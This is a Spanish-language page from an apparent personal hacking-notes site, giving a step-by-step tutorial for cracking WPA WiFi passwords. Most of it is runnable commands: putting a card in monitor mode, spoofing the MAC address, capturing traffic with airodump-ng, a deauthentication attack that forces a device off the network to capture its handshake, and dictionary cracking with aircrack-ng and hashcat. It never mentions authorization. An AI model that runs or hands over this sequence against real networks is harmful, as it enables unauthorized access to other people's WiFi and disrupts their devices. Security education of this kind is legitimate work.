Hacking con Rulo
Español
EspañolEnglish
Español
EspañolEnglish
  • 👋Bienvenido
    • Hacking con Rulo
    • ¿Empezar en Hacking?
  • 🌐Metodologia y Recursos
    • Reconocimiento
    • Enumeracion/Escaneo
    • Explotacion
    • Escalacion de Privilegios
    • Post-Explotacion
  • ✍️Writeups
    • Challenges
      • OSINT
        • Cyber Investigator CTF
    • Maquinas
      • Gaming Server
      • h4cked
      • Buffer Overflow Prep OSCP
  • Hacking WiFi
Con tecnología de GitBook
En esta página

¿Te fue útil?

Hacking WiFi

AnteriorBuffer Overflow Prep OSCP

Última actualización hace 11 meses

¿Te fue útil?

  1. Para empezar tenemos que poner nuestra placa en modo monitor con

airmon-ng start wlan0

  1. Despues matamos todos los procesos posibles que nos puedan dar problemas luego.

airmon-ng check kill

  1. Luego para cambiar la mac tendremos que hacer lo siguiente:

    1. ifconfig wlan0mon down

    2. macchanger --mac=00:20:91:da:1b:6a wlan0mon

    3. ifconfig wlan0mon up

  2. Y ahora deberiamos poder ver que la mac actual esta cambiada:

┌─[root@parrot]─[/home/s4vitar/Desktop/Red]
└──╼ #macchanger -s wlan0mon
Current MAC:   00:20:91:da:1b:6a (J125, NATIONAL SECURITY AGENCY)
Permanent MAC: e4:70:b8:d3:93:5c (unknown)

  1. Ahora nos ponemos en escucha con airodump-ng wlan0mon

  1. Identificamos la red que queremos crackear y le sacamos el BSSID y el canal por donde esta, ejecutamos de vuelta el airodump-ng wlan0mon <BSSID> --channel <CANAL>

Ahora tenemos que seleccionar un dispositivo que por preferencia este generando paquetes para hacer el ataque de deautenticacion y asi capturar el handshake

  1. Izquierdo: Una vez que tenemos la MAC del dispositivo, le vamos a hacer un ataque de deautenticacion para que cuando se vuelva a conectar, capturemos el handshake

-0 = Significa el tipo de ataque, en este caso Deautenticacion y el numero siguente, la cantidad de paquetes a enviar.

  1. Lado Derecho: Nos ponemos a escuchar por el mismo canal y solo a la bssid objetivo, y todo el output lo escribimos en un archivo que elijamos, en este caso Chiambret

  1. Despues de esto enviamos el ataque y cuando el dispositivo se conecte de vuelta, vamos a capturar el handshake

  1. Ahora con el handshake capturado solo nos queda hacerle un ataque de fuerza bruta con un diccionario y esperar a tener suerte que la contraseña este ahi.

En caso de que quiseramos utilizar hashcat para hacer uso de nuestra GPU, deberiamos hacer lo siguiente:

  1. Pasar el archivo .cap a un formato el cual hashcat pueda utilizar, para esto se puede utilizar aircrack o cap2hccapx.bin, el cual se encuentra en /usr/share/hashcat-utils

aircrack-ng -j hashcatCapture Chiambrett.cap

./cap2hccapx.bin /home/rulo/SantaRosa/Chiambret.cap Chiambret.hccapx

  1. Una vez ya tengamos el archivo creado, solo nos queda ejecutar hashcat

hashcat -m 2500 -d 1 Chiambret.hccapx rockyou.txt --deprecated-check-disable

  1. Y cuando termine el proceso, podemos ver si fue crackeado con exito de la siguiente manera:

hashcat --show -m 2500 Chiambret.hccapx --deprecated-check-disable

gg
Page cover image